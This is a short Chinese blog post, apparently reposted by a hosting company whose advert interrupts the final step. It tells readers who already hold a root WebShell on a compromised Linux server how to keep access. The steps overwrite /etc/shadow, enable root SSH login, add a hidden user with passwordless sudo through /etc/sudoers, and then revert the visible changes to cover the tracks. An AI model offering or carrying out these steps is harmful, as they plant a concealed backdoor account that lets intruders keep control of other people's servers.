linux提权 Root权限WebShell提权
没啥技术含量,一种思路,让某些得到Root权限WebShell的同学可以快点拿到权限. 某日拿到某站WebShell,RedHat(红旗linux)系统,Tomcat程序是Root身份启动的,WebShell当然也拥有Root权限. 具体提权思路: 1.WebShell直接替换Root密码:/etc/shadow //记得备份 2.允许Root通过ssh登陆: 修改:/etc/ssh/sshd_config PermitRootLogin yes #允许Root登陆 3.重启ssh服务:service ssh restart 4.以Root身份登陆ssh,增加一个用户: useradd application passwd //根据提示设置密码 5.更改application用户运行su不需密码: chmod w /etc/sudoers //增加写入权限,默认只读 修改:/etc/sudoers vi /etc/sudoers 加入:application ALL=(ALL) NOPASSWD: ALL 6.把Root密码修改回原样,禁止Root登陆.并去除sudoers的写属性(chmod -w /etc/sudoers). 7.当然
|
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
还要:chmod -w /etc/sudoers
